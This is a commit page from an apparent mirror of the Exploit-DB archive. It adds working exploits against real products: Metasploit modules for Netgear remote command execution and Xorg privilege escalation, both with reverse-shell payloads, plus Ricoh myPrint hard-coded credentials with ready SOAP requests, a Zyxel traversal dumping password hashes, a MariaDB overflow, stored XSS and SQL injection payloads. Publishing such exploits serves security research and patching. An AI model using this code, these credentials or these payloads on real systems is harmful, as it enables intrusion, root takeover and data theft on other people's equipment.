bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-11-28

Browse source 
10 changes to exploits/shellcodes

MariaDB Client 10.1.26 - Denial of Service (PoC)
Arm Whois 3.11 - Buffer Overflow (ASLR)
Xorg X11 Server - SUID privilege escalation (Metasploit)
ELBA5 5.8.0 - Remote Code Execution
Netgear Devices - Unauthenticated Remote Command Execution (Metasploit)
Ricoh myPrint 2.9.2.4 - Hard-Coded Credentials
WordPress Plugins Easy Testimonials 3.2 - Cross-Site Scripting
Ticketly 1.0 - 'kind_id' SQL Injection
No-Cms 1.0 - 'order_by' SQL Injection
Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal
This commit is contained in:
Offensive Security 2018-11-28 11:08:29 +00:00
parent 7967efda82
commit dfd1e454e1
11 changed files with 1105 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

104
exploits/hardware/remote/45909.rb Executable file
View file

@ -0,0 +1,104 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Netgear Devices Unauthenticated Remote Command Execution',
'Description' => %q{
From the CVE-2016-1555 page: (1) boardData102.php, (2) boardData103.php,
(3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in
Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350,
WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute
arbitrary commands.
},
'Author' =>
[
'Daming Dominic Chen <ddchen[at]cs.cmu.edu>', # Vuln discovery
'Imran Dawoodjee <imrandawoodjee.infosec[at]gmail.com>' # MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2016-1555'],
['URL', 'https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic'],
['PACKETSTORM', '135956'],
['URL', 'http://seclists.org/fulldisclosure/2016/Feb/112']
],
'DisclosureDate' => 'Feb 25 2016', # According to http://seclists.org/fulldisclosure/2016/Feb/112
'Privileged' => true,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'Payload' => {},
'DefaultOptions' => {
'CMDSTAGER::FLAVOR' => 'wget',
'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp',
'WfsDelay' => 10 },
'Targets' => [['Automatic', { }]],
'CmdStagerFlavor'=> %w{ echo printf wget },
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'Path of the vulnerable URI.', '/boardDataWW.php']), # boardDataWW.php
OptString.new('MAC_ADDRESS', [true, 'MAC address to use (default: random)', Rex::Text.rand_text_hex(12)])
])
end
# check for vulnerability existence
def check
fingerprint = Rex::Text.rand_text_alpha(12) # If vulnerability is present, we will get this back in the response
res = execute_command("echo #{fingerprint}") # the raw POST response
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
unless res.code == 200
return CheckCode::Safe
end
unless res.get_html_document.at('input').to_s.include? fingerprint
return CheckCode::Safe
end
CheckCode::Vulnerable
end
# execute a command, or simply send a POST request
def execute_command(cmd, opts = {})
vars_post = {
'macAddress' => "#{datastore['MAC_ADDRESS']};#{cmd};",
'reginfo' => '1',
'writeData' => 'Submit'
}
send_request_cgi({
'method' => 'POST',
'headers' => { 'Connection' => 'Keep-Alive' },
'uri' => normalize_uri(target_uri.path),
'vars_post' => vars_post
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the target!")
end
# the exploit method
def exploit
#run a check before attempting to exploit
unless [CheckCode::Vulnerable].include? check
fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
end
execute_cmdstager(linemax: 2048) # maximum 130,000
end
end

283
exploits/hardware/webapps/45899.txt Normal file
View file

@ -0,0 +1,283 @@
# Exploit Title: Ricoh myPrint 2.9.2.4 - Hard-Coded Credentials
# Google Dork: intitle:"ricoh myprint" "Copyright Ricoh. All Rights Reserved"
# Date: 2018-11-19
# Exploit Author: Hodorsec
# Vendor Homepage: https://www.ricoh.com
# Software Link: https://www.ricoh-europe.com/support/product-support/software-support-detail.html?prodId=100-13203
# Versions:
# myPrint - Windows client version 2.9.2.4
# myPrint - Android client version 2.2.7
# Tested on: Ricoh myPrint clients and WSDL webservice
# WSDL URL format: https://{HOST}/RicohmyPrint/MyPrintWebService.asmx?wsdl
# CVE: N/A
# Description:
# Hardcoded credentials in the Ricoh myPrint application 2.9.2.4 for Windows and 2.2.7 for Android
# give access to any externally disclosed myPrint WSDL API, as demonstrated by discovering
# API secrets of related Google cloud printers, encrypted passwords of mail servers and
# names of printed files.
# Additional Information:
# Hardcoded credentials in the Ricoh myPrint application 2.9.2.4 for Windows and 2.2.7 for
# Android (reverse-engineered, identical credentials), gives access
# to any externally disclosed Ricoh myPrint WSDL API. Using the found credentials, several info can be obtained, such as:
# * Show settings such as local paths, used mailserver, mailaddresses for POP/IMAP and encrypted passwords (appears to be stream-based
# encrypted, seeing different lengths of base64 hashes passwords (Algorithm yet unknown)). --> ReadMobileSettings
# * Checks if a password is valid for ANY known user; returns "true" if password is valid for a known user --> IsPasswordValid
# * Shows all user info such as ID, name by looking up email alias --> IdentifierByEmailAlias
# * Show used internal IP addresses and TCP ports of related printers/server for Ricoh myPrint
# * Show related Google cloud printers with API secrets --> ReadGoogleCloudPrinters
# * Show all printjob-statuses with filenames --> GetJobList
# * Show related organizations --> ReadOrganizations
# Affected Components:
# * Tested Ricoh myPrint clients with indicated versions and probably any remotely accessible myPrint webserver with an accessible WSDL API.
# Affected Code:
# * Android client "WebService.java"
...<SNIP>...
public static final class
{
public static final String AUTH_PASS = "Kyg63WfC";
public static final String AUTH_USER = "ricohmyprint";
public static final String NS_RICOH = "http://RicohmyPrint.com/";
public static final String NS_SOAP12 = "http://www.w3.org/2003/05/soap-envelope";
public static final String PRE_RICOH = "ric";
public static final String PRE_SOAP12 = "soap";
public static final String SERVICE = "/RicohmyPrint/myprintwebservice.asmx";
public static final String SUPPORTED_LANGS[] = {
"en", "ca", "de", "es", "fr", "it", "nl", "no", "pl", "pt",
"sv"
};
...<SNIP>...
Attack Type:
* Remote
Attack Vectors:
Steps:
* Download the Android APK or Windows executable installer
* Reverse engineer the APK or DLL's from the Windows installer
* Look for the string "PASS" with a regex tool, which should pop up a hit
* Access the WSDL on a reachable Ricoh myPrint environment and enumerate operations with a SOAP tool (e.g. "ReadMobileSettings")
* Use any operation, substitute the "AuthSoapHd" values for UserName and Password with the found credentials
* Perform the request and check results
Hardcoded Credentials:
* Username: ricohmyprint
* Password: Kyg63WfC
Header requirement:
Required for using in an SOAP WSDL POST message as a header with values:
<soapenv:Header>
<ric:AuthSoapHd>
<ric:UserName><![CDATA[ricohmyprint]]></ric:UserName>
<ric:Password><![CDATA[Kyg63WfC]]></ric:Password>
<ric:Version><![CDATA[0.1]]></ric:Version>
<ric:Application><![CDATA[Desktop]]></ric:Application>
<ric:DeviceId><![CDATA[1]]></ric:DeviceId>
</ric:AuthSoapHd>
</soapenv:Header>
Examples:
* ReadMobileSettings
---------------------------------------------
REQUEST
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ric="http://RicohmyPrint.com/">
<soapenv:Header>
<ric:AuthSoapHd>
<ric:UserName><![CDATA[ricohmyprint]]></ric:UserName>
<ric:Password><![CDATA[Kyg63WfC]]></ric:Password>
<ric:Version><![CDATA[0.1]]></ric:Version>
<ric:Application><![CDATA[Desktop]]></ric:Application>
<ric:DeviceId><![CDATA[1]]></ric:DeviceId>
</ric:AuthSoapHd>
</soapenv:Header>
<soapenv:Body>
<ric:ReadMobileSettings/>
</soapenv:Body>
</soapenv:Envelope>
RESPONSE
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<ReadMobileSettingsResponse xmlns="http://RicohmyPrint.com/">
<ReadMobileSettingsResult>
<WatchFolder>C:\ProgramData\RICOH\WatchFolder</WatchFolder>
<ProcessFolder>C:\ProgramData\RICOH\ProcessFolder</ProcessFolder>
<WebUploadFolder>C:\ProgramData\RICOH\WebUploadFolder</WebUploadFolder>
<MaximumNumberProcessesRunningAllowed>0</MaximumNumberProcessesRunningAllowed>
<ToFilePrinterName>myPrintToFile</ToFilePrinterName>
<PrinterDriverName>RICOH Aficio MP C3500 PCL 6</PrinterDriverName>
<POPIMAP>
<EmailHandling>SINGLE</EmailHandling>
<RetrievingInterval>5</RetrievingInterval>
<EmailProtocol>POP3</EmailProtocol>
<EmailServer>pop.someserver.local</EmailServer>
<Port>110</Port>
<PrintEmailBody>true</PrintEmailBody>
<UserName>print@someserver.local</UserName>
<Password>REDACTED</Password>
<Domain />
<EmailWebservice />
<ExchangeVersion>5</ExchangeVersion>
<OverrideCertificateCheck>false</OverrideCertificateCheck>
</POPIMAP>
<SMTP>
<SmtpServer>smtp.someserver.local</SmtpServer>
<Port>25</Port>
<EmailDisplayName>Ricoh myPrint</EmailDisplayName>
<EmailFrom>someuser@someserver.local</EmailFrom>
<EnableSsl>false</EnableSsl>
<UserName />
<Password>REDACTED</Password>
</SMTP>
<GCP>
<Id>0</Id>
<XmppPort>80</XmppPort>
<UseSocksProxy>false</UseSocksProxy>
<SocksProxyServer />
<SocksProxyVersion>5</SocksProxyVersion>
<SocksProxyPort>1080</SocksProxyPort>
<SocksProxyUser />
</GCP>
<LPRPrinterPort>0</LPRPrinterPort>
<UseLPR>false</UseLPR>
<EmailRefusal>postmaster</EmailRefusal>
</ReadMobileSettingsResult>
</ReadMobileSettingsResponse>
</soap:Body>
</soap:Envelope>
---------------------------------------------
* IdentifierByEmailAlias
---------------------------------------------
REQUEST:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ric="http://RicohmyPrint.com/">
<soapenv:Header>
<ric:AuthSoapHd>
<ric:UserName><![CDATA[ricohmyprint]]></ric:UserName>
<ric:Password><![CDATA[Kyg63WfC]]></ric:Password>
<ric:Version><![CDATA[a]]></ric:Version>
<ric:Application><![CDATA[b]]></ric:Application>
<ric:DeviceId><![CDATA[c]]></ric:DeviceId>
</ric:AuthSoapHd>
</soapenv:Header>
<soapenv:Body>
<ric:IdentifierByEmailAlias>
<!--Optional:-->
<ric:emailAlias>admin</ric:emailAlias>
</ric:IdentifierByEmailAlias>
</soapenv:Body>
</soapenv:Envelope>
RESPONSE:
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<IdentifierByEmailAliasResponse xmlns="http://RicohmyPrint.com/">
<IdentifierByEmailAliasResult>
<Exists>true</Exists>
<Account>
<Id>1337</Id>
<AccountId>83e754ff-fa1d-48b6-adb2-7cb60a22476d</AccountId>
<UserName>admin</UserName>
<Emailaddress>someuser@someserver.local</Emailaddress>
<PersonalmyPrintId>1osd9KJ</PersonalmyPrintId>
<Balance>5</Balance>
<BalanceFormatted>€ 5,00</BalanceFormatted>
<Primarypin>123456</Primarypin>
<SecondaryPin/>
<OrganisationId>1</OrganisationId>
<ByClientCreated>false</ByClientCreated>
<IsActivated>true</IsActivated>
<GuestAccount>false</GuestAccount>
<Aliasses/>
<Transactions/>
<Language>GB</Language>
<MpPrintingPreferences>
<Id>0</Id>
<DuplexPreference>TwoSidedLongEdge</DuplexPreference>
<ColorPreference>Monochrome</ColorPreference>
<ChangingDuplexEnabled>true</ChangingDuplexEnabled>
<ChangingColorEnabled>true</ChangingColorEnabled>
<StaplePreference>StapleTopLeft</StaplePreference>
<PagePerSheetPreference>One</PagePerSheetPreference>
<ChangingStapleEnabled>true</ChangingStapleEnabled>
<ChangingPagePerSheetEnabled>true</ChangingPagePerSheetEnabled>
</MpPrintingPreferences>
<QpilotCardID/>
<ClientType>IDPLocal</ClientType>
<Administrator>false</Administrator>
<HelpDesk>false</HelpDesk>
<PrintQueue>
<Id>1</Id>
<PrinterId>1</PrinterId>
<PrintQueueType>LPR</PrintQueueType>
<PrinterName>Default printer</PrinterName>
<PrinterAddress>127.0.0.1</PrinterAddress>
<QueueName>lp</QueueName>
<Port>515</Port>
<IsPublic>true</IsPublic>
<Priority>0</Priority>
<Active>true</Active>
</PrintQueue>
<Domain/>
</Account>
</IdentifierByEmailAliasResult>
</IdentifierByEmailAliasResponse>
</soap:Body>
</soap:Envelope>
---------------------------------------------
Soap Endpoints:
* ApplyAgreementAcceptance
* ChangePassword
* ClearCache
* CreateAccount
* CreateAccountByCardId
* FinishedJobProcessing
* GetConditionsUri
* GetImage
* GetJobList
* GetLanguageTable
* GetPrintCapabilities
* GetPrintQueueRuleResult
* GetSupportUri
* IdentifierByEmailAlias
* IsPasswordValid
* LogIn
* Operation
* ReadAccount
* ReadGoogleCloudPrinters
* ReadMobileSettings
* ReadMpPrintQueues
* ReadOrganizations
* ReadSettings
* ReSendPincode
* ResetPassword
* RetrieveCloudPrintJobsAllowed
* RetrieveEmailAllowed
* SendCancelPrintJob
* SendHeartbeat
* SendPrinterName
* Test
* UpdateAccount
* UpdateGoogleCloudPrinter
* UploadFile
* UploadFileAndPrintTicket
* VerifyJobProcessing
* VoucherToCash
* WaitingJob
* WriteLog
Disclosure Timeline using CERT/CC disclosure policy:
- 04-10-18: Requested CVE
- 05-10-18: Contacted vendor for initial contact, used several publicly known mailaddresses
- 10-10-18: Contacted CERT for Vulnerability Disclosure coordination due to no response from vendor
- 22-10-18: CERT responded it received no response on their behalf from vendor
- 22-10-18: Sent reminder to vendor
- 19-11-18: Public Disclosure

21
exploits/hardware/webapps/45904.txt Normal file
View file

@ -0,0 +1,21 @@
# Exploit Title: Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal
# Date: 2018-11-17
# Exploit Author: numan türle
# Vendor Homepage: https://www.zyxel.com/
# Software Link: https://www.zyxel.com/products_services/Wireless-N-VDSL2-4-port-Gateway-with-USB-VMG1312-B10D/
# Tested on: macOS
# Fixed firmware: 5.13(AAXA.8)C0
# PoC
@modem_gateway = "192.168.1.1" // default address
http://@modem_gateway/../../../../../../../../../../../../etc/passwd
here are the contents :
############################## contents ##############################
nobody:x:99:99:nobody:/nonexistent:/bin/false
root:zKtrESdI2DPME:0:0:root:/home/root:/bin/sh
supervisor:.t7H3bCRtJ6UY:12:12:supervisor:/home/supervisor:/bin/sh
admin:avHcRxJLoXvas:21:21:admin:/home/admin:/bin/sh
user:AebeEcyKDnOzI:31:31:user:/home/user:/bin/sh

63
exploits/linux/dos/45901.txt Normal file
View file

@ -0,0 +1,63 @@
# Exploit Title: MariaDB Client 10.1.26 - Denial of Service (PoC)
# Google Dork: None
# Date: 2018-11-16
# Exploit Author: strider
# Software Link: https://github.com/MariaDB/server
# Version: mysql Ver 15.1 Distrib 10.1.26-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
# Tested on: Debian 9 Stretch x64 / Ubuntu 18.04 x86_64
# CVE : None
# Description:
# MariaDB uses environment variables. The PAGER variable is vulnerable to a bufferoverflow.
# If the environment variable PAGER is greater or equals 512 characters it will crash and make client unusable.
# This is caused by a the function strmov which takes all from source and copy that
# into destination which have a fixed size.
Codepart:
static char default_pager[FN_REFLEN];
char *tmp=getenv("PAGER");
if (tmp && strlen(tmp))
{
default_pager_set= 1;
strmov(default_pager, tmp);
}
Proof of Concept:
Step 1:
export PAGER=$(python -c "print '\x41' * 512")
Step 2:
mariadb -u user -p
Crash
---------------------------------------------------------------------
peda output:
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x555555b73600 ('A' <repeats 200 times>...)
RBX: 0x555555b7cbc8 ('A' <repeats 200 times>...)
RCX: 0x70 ('p')
RDX: 0x0
RSI: 0x555555bafe40 ('A' <repeats 200 times>...)
RDI: 0x555555bb0040
RBP: 0x7fffffffdfa0 --> 0x555555639a80 (<__libc_csu_init>: push r15)
RSP: 0x7fffffffdd48 --> 0x55555558e5bc (<main+620>: mov rax,QWORD PTR [r12])
RIP: 0x7ffff677e2e6 (<__strcpy_sse2_unaligned+374>: movdqu XMMWORD PTR [rdi-0x40],xmm4)
R8 : 0x555555b92580 ('A' <repeats 200 times>...)
R9 : 0x20 (' ')
R10: 0x7fffffffa5a0 --> 0x7fffffffa5d0 --> 0x7fffffffdb80 --> 0x7fffffffdc10 --> 0x0
R11: 0x7ffff6846d68 --> 0xfff37778fff37768
R12: 0x555555b00bc0 --> 0x555555b00b80 --> 0x40000000 ('')
R13: 0x7ffff6a846e8 --> 0x7ffff6a84600 --> 0xfbad2084
R14: 0x0
R15: 0x0
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)

215
exploits/multiple/local/45908.rb Executable file
View file

@ -0,0 +1,215 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::Kernel
def initialize(info = {})
super(update_info(info,
'Name' => 'Xorg X11 Server SUID privilege escalation',
'Description' => %q{
This module attempts to gain root privileges with SUID Xorg X11 server
versions 1.19.0 < 1.20.3.
A permission check flaw exists for -modulepath and -logfile options when
starting Xorg. This allows unprivileged users that can start the server
the ability to elevate privileges and run arbitrary code under root
privileges.
This module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708).
CentOS default install will require console auth for the users session.
Cron launches the payload so if Selinux is enforcing exploitation
may still be possible, but the module will bail.
Xorg must have SUID permissions and may not start if running.
On exploitation a crontab.old backup file will be created by Xorg.
This module will remove the .old file and restore crontab after
successful exploitation. Failed exploitation may result in a corrupted
crontab. On successful exploitation artifacts will be created consistant
with starting Xorg and running a cron.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Narendra Shinde', # Discovery and exploit
'Raptor - 0xdea', # Modified exploit for cron
'Aaron Ringo', # Metasploit module
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module
],
'DisclosureDate' => 'Oct 25 2018',
'References' =>
[
[ 'CVE', '2018-14665' ],
[ 'BID', '105741' ],
[ 'EDB', '45697' ],
[ 'EDB', '45742' ],
[ 'EDB', '45832' ],
[ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],
[ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
],
'Platform' => %w[openbsd linux],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'SessionTypes' => %w[shell meterpreter],
'Targets' =>
[
['OpenBSD', {
'Platform' => 'unix',
'Arch' => [ ARCH_CMD ] } ],
['Linux x64', {
'Platform' => 'linux',
'Arch' => [ ARCH_X64 ] } ],
['Linux x86', {
'Platform' => 'linux',
'Arch' => [ ARCH_X86 ] } ]
],
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/reverse_openssl',
'WfsDelay' => 120
},
'DefaultTarget' => 0))
register_advanced_options(
[
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),
OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ])
]
)
end
def check
# linux checks
uname = cmd_exec "uname"
if uname =~ /linux/i
vprint_status "Running additional check for Linux"
if datastore['ConsoleLock']
user = cmd_exec "id -un"
unless exist? "/var/run/console/#{user}"
vprint_error "No console lock for #{user}"
return CheckCode::Safe
end
vprint_good "Console lock for #{user}"
end
if selinux_installed?
if selinux_enforcing?
vprint_error 'Selinux is enforcing'
return CheckCode::Safe
end
end
vprint_good "Selinux is not an issue"
end
# suid program check
xorg_path = cmd_exec "command -v Xorg"
unless xorg_path.include?("Xorg")
vprint_error "Could not find Xorg executable"
return CheckCode::Safe
end
vprint_good "Xorg path found at #{xorg_path}"
unless setuid? xorg_path
vprint_error "Xorg binary #{xorg_path} is not SUID"
return CheckCode::Safe
end
vprint_good "Xorg binary #{xorg_path} is SUID"
# version check
x_version = cmd_exec "Xorg -version"
if x_version.include?("Release Date")
v = Gem::Version.new(x_version.scan(/\d\.\d+\.\d+/).first)
unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))
vprint_error "Xorg version #{v} not supported"
return CheckCode::Safe
end
elsif x_version.include?("Fatal server error")
vprint_error "User probably does not have console auth"
vprint_error "Below is Xorg -version output"
vprint_error x_version
return CheckCode::Safe
else
vprint_warning "Could not parse Xorg -version output"
return CheckCode::Appears
end
vprint_good "Xorg version #{v} is vulnerable"
# process check for /X
proc_list = cmd_exec "ps ax"
if proc_list.include?('/X ')
vprint_warning('Xorg in process list')
return CheckCode::Appears
end
vprint_good('Xorg does not appear running')
return CheckCode::Vulnerable
end
def on_new_session(session)
if session.type.to_s.eql? 'meterpreter'
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
session.sys.process.execute '/bin/sh', "-c \"#{@clean_up}\""
else
session.shell_command(@clean_up)
end
print_good "Returning session after cleaning"
ensure
super
end
def exploit
check_status = check
if check_status == CheckCode::Appears
print_warning 'Could not get version or Xorg process possibly running, may fail'
elsif check_status == CheckCode::Safe
fail_with Failure::NotVulnerable, 'Target not vulnerable'
end
if is_root?
fail_with Failure::BadConfig, 'This session already has root privileges'
end
unless writable? datastore['WritableDir']
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
end
print_good 'Passed all initial checks for exploit'
pscript = "#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}"
@clean_up = "/bin/cat #{pscript}.b > /etc/crontab ; /bin/rm -f #{pscript}.b /etc/crontab.old"
xdisplay = datastore['Xdisplay']
# Uploading file crontab will run
print_status 'Uploading your payload, this could take a while'
if payload.arch.first == 'cmd'
write_file(pscript, payload.encoded)
else
write_file(pscript, generate_payload_exe)
end
register_file_for_cleanup pscript
chmod pscript
# Exploit steps on crontab so backing it up
cmd_exec "cat /etc/crontab > #{pscript}.b"
# Actual exploit with cron overwrite
print_status 'Trying /etc/crontab overwrite'
cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null"
Rex.sleep 5
cmd_exec "pkill Xorg"
Rex.sleep 1
cron_check = cmd_exec "grep -F #{pscript} /etc/crontab"
unless cron_check.include? pscript
rm_f "#{pscript}.b"
print_error 'Deleting crontab backup'
fail_with Failure::NotVulnerable, '/etc/crontab not modified'
end
print_good '/etc/crontab overwrite successful. Waiting for job to run (may take a minute)...'
end
end

30
exploits/php/webapps/45900.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Wordpress Plugins Easy Testimonials 3.2 - Cross-Site Scripting
# Date: 2018-11-23
# Exploit Author: En_dust
# Vendor Homepage: https://wordpress.org/plugins/easy-testimonials/
# Software Link: https://wordpress.org/plugins/easy-testimonials/
# Version: 3.2
# CVE : N/A
# Tested on: Windows 10 x64
# description:
# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins easy testimonials 3.2.
# Three parameters(_ikcf_client _ikcf_position _ikcf_other) have Cross-Site Scripting.
# POC
# XSS Stored
POST http://localhost/wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 2152
Referer: http://localhost/wp-admin/post-new.php?post_type=testimonial&wp-post-new-reload=true
Cookie: wp-saving-post=25-check; wp-saving-post=22-saved; wordpress_524b5a925bc7b1b05f5b295d7fcd09b9=admin%7C1543134496%7CkuybvZvg3evKxitZn7s2lZSoaeDOfbTwXP0iMKFz425%7C481919de475c08441e455ffe01f4b8a241ea13f3a4255be476841ddc281597bc; wp-settings-time-1=1542959022; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26posts_list_mode%3Dexcerpt; PHPSESSID=au6fo2rac6sn2hgk0mnniq17k2; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_524b5a925bc7b1b05f5b295d7fcd09b9=admin%7C1543134496%7CkuybvZvg3evKxitZn7s2lZSoaeDOfbTwXP0iMKFz425%7C9bce6802e21d94bc37ab3eabf8dfe2950603d327e32a8ad14e167b4550d036dc
Connection: keep-alive
Upgrade-Insecure-Requests: 1
_wpnonce=b3ca69b020&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dtestimonial&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=testimonial&original_post_status=auto-draft&referredby=&_wp_original_http_referer=&auto_draft=&post_ID=25&meta-box-order-nonce=c25a6e37b2&closedpostboxesnonce=4784cc9ba9&post_title=test&samplepermalinknonce=f39f8eec26&content=test&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&aa=2018&mm=11&jj=23&hh=17&mn=12&ss=56&hidden_mm=11&cur_mm=11&hidden_jj=23&cur_jj=23&hidden_aa=2018&cur_aa=2018&hidden_hh=17&cur_hh=17&hidden_mn=12&cur_mn=12&original_publish=%E5%8F%91%E5%B8%83&publish=%E5%8F%91%E5%B8%83&tax_input%5Beasy-testimonial-category%5D%5B%5D=0&neweasy-testimonial-category=%E6%96%B0%E5%88%86%E7%B1%BB%E7%9B%AE%E5%BD%95%E5%90%8D&neweasy-testimonial-category_parent=-1&_ajax_nonce-add-easy-testimonial-category=50d8975094&my-custom-fields_wpnonce=b074ff3409&_ikcf_client=[XSS]&_ikcf_email=test%40test.com&_ikcf_position=[XSS]&_ikcf_other=[XSS]&_ikcf_rating=1&excerpt=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=81df7811e1&post_name=&post_grid_post_settings_input_nonce=95c656b2da&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dtestimonial&post_grid_post_settings%5Bpost_skin%5D=flat&post_grid_post_settings%5Bcustom_thumb_source%5D=http%3A%2F%2Fwww.wordpress.com%2Fwp-content%2Fplugins%2Fpost-grid%2Fassets%2Ffrontend%2Fcss%2Fimages%2Fplaceholder.png&post_grid_post_settings%5Bfont_awesome_icon%5D=&post_grid_post_settings%5Bfont_awesome_icon_color%5D=737272&post_grid_post_settings%5Bfont_awesome_icon_size%5D=50px&post_grid_post_settings%5Bcustom_youtube_id%5D=&post_grid_post_settings%5Bcustom_vimeo_id%5D=&post_grid_post_settings%5Bcustom_dailymotion_id%5D=&post_grid_post_settings%5Bcustom_mp3_url%5D=&post_grid_post_settings%5Bcustom_soundcloud_id%5D=

79
exploits/php/webapps/45902.txt Normal file
View file

@ -0,0 +1,79 @@
# Exploit Title: Ticketly 1.0 Multiple SQL Injection
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-11-19
# Google Dork: N/A
# Vendor: Abisoft (https://abisoftgt.net)
# Software Link: https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql
# Affected Version: 1.0
# Patched Version: unpatched
# Category: Web Application
# Platform: Windows & Ubuntu
# Tested on: Win10x64 & Kali Linux
# CVE: 2018-18923
# 1. Technical Description:
# Ticketly 1.0 are affected by SQL Injection in multiple parameters and
# resources through POST. This allows a attacker to read and modify
# sensitive information from the database used by the application.
# 2. Proof Of Concept (PoC):
# 2.1 The following POST request generates an error 500 in the Application (add ' in name parameter)
---
POST /ticketly/action/addproject.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/ticketly/projects.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 32
Connection: close
name=Test%22&description=Test
---
# 2.2 In another request, add two ' to receive a code 200 OK
---
POST /ticketly/action/addproject.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/ticketly/projects.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 32
Connection: close
name=Test%22%22&description=Test
---
# 3. Payloads
# 3.1 Payload (boolean-based blind)
name=Test" RLIKE (SELECT (CASE WHEN (4632=4632) THEN 0x54657374 ELSE 0x28 END)) AND "lrmZ"="lrmZ&description=Test
# 3.2 Payload (error-based)
name=Test” AND EXTRACTVALUE(9139,CONCAT(0x5c,0x7176766a71,(SELECT (ELT(9139=9139,1))),0x7178717a71)) AND "SZJL"="SZJL&description=Test
#3.3 Payload (AND/OR time-based blind)
name=Test” RLIKE SLEEP(5) AND "WkTS"="WkTS&description=Test
# 4. Vulnerables resources and parameters
# /action/addproject.php (description, name, category_id and description)
# /action/addticket.php (king_id, priority_id, project_id, status_id and title)
# /reports.php (kind_id y status_id)
